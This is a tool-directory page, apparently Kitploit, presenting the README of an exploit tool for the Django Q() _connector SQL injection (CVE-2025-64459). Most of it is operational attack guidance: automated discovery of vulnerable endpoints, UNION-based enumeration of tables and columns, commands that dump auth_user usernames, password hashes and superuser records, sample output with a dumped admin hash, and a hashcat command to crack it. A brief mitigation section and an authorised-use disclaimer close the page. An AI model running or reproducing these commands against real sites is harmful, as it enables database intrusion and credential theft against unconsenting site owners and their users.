Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
RedTeamBrasil-CVE-2025-64459 — NEO-SQLi — Django _connector SQLインジェクション(CVE-2025-64459)を悪用する | RedTeam Brasilチャンネル | Kitploit
ツール/GitHubGitHub/rafaelchriss/redteambrasil-cve-2025-64459
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育データベースセキュリティ
GitHubrafaelchriss/redteambrasil-cve-2025-64459

RedTeamBrasil-CVE-2025-64459

NEO-SQLi — Django _connector SQLインジェクション(CVE-2025-64459)を悪用する | RedTeam Brasilチャンネル

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
1ヶ月前未レビュー

connector-sqli

Django ORM の SQL インジェクション自動攻撃
Q オブジェクト _connector · CVE-2025-64459

cve django python license

🎥 RedTeam Brasil チャンネル — オフェンシブセキュリティを、実際に、ポルトガル語で。

root@kitploit:~
   ██████╗ ████████╗██████╗    connector-sqli
   ██╔══██╗╚══██╔══╝██╔══██╗   Django Q() `_connector` SQLi
   ██████╔╝   ██║   ██████╔╝   CVE-2025-64459
   ██╔══██╗   ██║   ██╔══██╗   canal RedTeam Brasil
   ██║  ██║   ██║   ██████╔╝   youtube.com/@RedTeamBrasil
   ╚═╝  ╚═╝   ╚═╝   ╚═════╝    uso autorizado apenas

📌 脆弱性について — CVE-2025-64459

Django の ORM は Q() オブジェクトでフィルタを組み立てます。コンストラクタ Q(*args, _connector=None, _negated=False, **kwargs) は特別な kwarg _connector を受け付けます — WHERE 内の条件を連結する文字列(AND/OR)です。

影響を受けるバージョンでは、この値はサニタイズされておらず、生のまま SQL に渡されていました。 アプリケーションが辞書展開を介してユーザー入力を Q() / .filter() / .exclude() / .get() に直接渡す場合 — 古典的なアンチパターン:

root@kitploit:~
# ❌ VULNERÁVEL
posts = Post.objects.filter(Q(**request.GET))     # ou .filter(**request.GET)

…攻撃者は _connector を制御し、条件間に任意の SQL を注入します (SQLite、PostgreSQL、MySQL などでも有効)。

DEBUG = True の場合、悪用はさらに簡単になります:Django のエラーページが 組み立て済みの SQL、ベーステーブル、列数を返します — ツールが UNION を 自力で組み立てるために使う、まさにその情報です。


⚡ 機能

汎用(特定のターゲットに縛られない)かつ自動化されたエクスプロイタ:

  • 🧭 エンドポイントを自動発見(--auto):ホームのクロール + robots/sitemap + 内蔵ワードリストで、各ルートを Django の FieldError でテスト。
  • 🔎 FieldError 経由で脆弱なエンドポイントと DEBUG=True を検出。
  • 🧠 エラーページの SQL を読んでベーステーブルと列数を自動検出。
  • 🎯 マーカーで反射列を特定 → デリミタによる抽出(ページのレンダリング方法に依存しない)。
  • 🗃️ テーブル一覧 → 列一覧 → 任意のテーブルをダンプ(UNION ベース)。
  • 🐚 対話モード(メニュー:テーブル → 列 → ダンプ)。
  • 🧪 Proxy(--proxy による Burp/mitmproxy)と HTTPS ターゲット。

🚀 インストール

root@kitploit:~
git clone https://github.com/rafaelchriss/RedTeamBrasil-CVE-2025-64459.git
cd RedTeamBrasil-CVE-2025-64459
pip install -r requirements.txt
chmod +x rtb_connector_sqli.py

🎮 使用方法

root@kitploit:~
# 1) confirmar a falha
python3 rtb_connector_sqli.py -u http://ALVO check

# 2) listar tabelas
python3 rtb_connector_sqli.py -u http://ALVO tables

# 3) listar colunas de uma tabela
python3 rtb_connector_sqli.py -u http://ALVO columns auth_user

# 4) dumpar (colunas específicas ou todas)
python3 rtb_connector_sqli.py -u http://ALVO dump auth_user --cols username,password,is_superuser
python3 rtb_connector_sqli.py -u http://ALVO dump auth_user --where "is_superuser=1"

# 5) atalho pros usuários do Django
python3 rtb_connector_sqli.py -u http://ALVO users

# 6) expressão SQL livre
python3 rtb_connector_sqli.py -u http://ALVO query "sqlite_version()"

# 7) MODO INTERATIVO (menu tabela → colunas → dump)
python3 rtb_connector_sqli.py -u http://ALVO shell

# 8) NÃO SABE A ROTA? deixa ele achar sozinho
python3 rtb_connector_sqli.py -u http://ALVO auto              # só descobre e lista
python3 rtb_connector_sqli.py -u http://ALVO --auto shell      # descobre e já explora

--auto(またはサブコマンド auto)を使用すると、ホームのクロール + robots.txt/sitemap.xml を実行し、リスト表示/検索ルートの内蔵ワードリスト(EN + PT-BR + API)を試行して、Django の FieldError を返すルートをマークします。間違った --path を渡すと、自動的に発見モードにフォールバックします。

オプション

root@kitploit:~
# tudo pelo Burp
python3 rtb_connector_sqli.py -u http://ALVO --proxy http://127.0.0.1:8080 users

# ou por variável de ambiente (sem a flag)
export HTTP_PROXY=http://127.0.0.1:8080 HTTPS_PROXY=http://127.0.0.1:8080
python3 rtb_connector_sqli.py -u http://ALVO shell

🖥️ 出力例

root@kitploit:~
[*] Alvo: http://ALVO/list
[+] Campos do model (6): author, content, created_at, id, status, title
[+] SQLi confirmada no `_connector` (CVE-2025-64459). near "'RTB'": syntax error
[+] Tabela base: <app>_<model>   ·   colunas no SELECT: 6
[+] Coluna refletida (leitura): posição 4
┌── auth_user (N)
│ admin | pbkdf2_sha256$600000$<salt>$<hash>= | is_superuser=1 | admin@target
└──

スーパーユーザーのハッシュを入手したら:

root@kitploit:~
hashcat -m 10000 hash.txt rockyou.txt      # Django usa pbkdf2_sha256

🛡️ 対策

  1. Django を更新:4.2.26 / 5.1.14 / 5.2.8+ へ。
  2. 決して request.GET を Q()/.filter() に直接渡さない。許可リストを使う:
    root@kitploit:~
    ALLOWED = {"title__icontains", "status"}
    safe = {k: v for k, v in request.GET.items() if k in ALLOWED}
    Post.objects.filter(**safe)
    
  3. 本番環境では DEBUG = False(SQL / テーブル / 設定情報を漏らさない)。
  4. データベースユーザーは最小権限にする。

⚖️ 法的免責事項

教育用ツールであり、許可されたテスト専用です(ラボ、CTF、スコープ内のバグバウンティ、契約済みペンテスト)。明示的な許可なくシステムに対して使用することは犯罪です — 責任はすべてあなた自身にあります。


RedTeam Brasil により制作 · 気に入ったら高評価とチャンネル登録をお願いします。

ツールをダウンロード
項目詳細
CVECVE-2025-64459
コンポーネントdjango.db.models — Q() / QuerySet(_connector と列エイリアス)
影響を受けるバージョンDjango < 4.2.26、< 5.1.14、< 5.2.8
修正4.2.26 / 5.1.14 / 5.2.8(またはそれ以降)に更新
影響データベースの任意読み取り(UNION / blind)→ 認証情報のダンプと攻撃チェーンの拡大
フラグ用途
--path /buscar脆弱なエンドポイント(デフォルト /list)
--autoエンドポイントを自動発見(クロール + ワードリスト)
--wordlist rotas.txt発見用の追加ルート(1行に1つ)
--base app_modelベーステーブルを強制指定(自動検出が失敗した場合)
--proxy http://127.0.0.1:8080すべてを Burp / mitmproxy に送信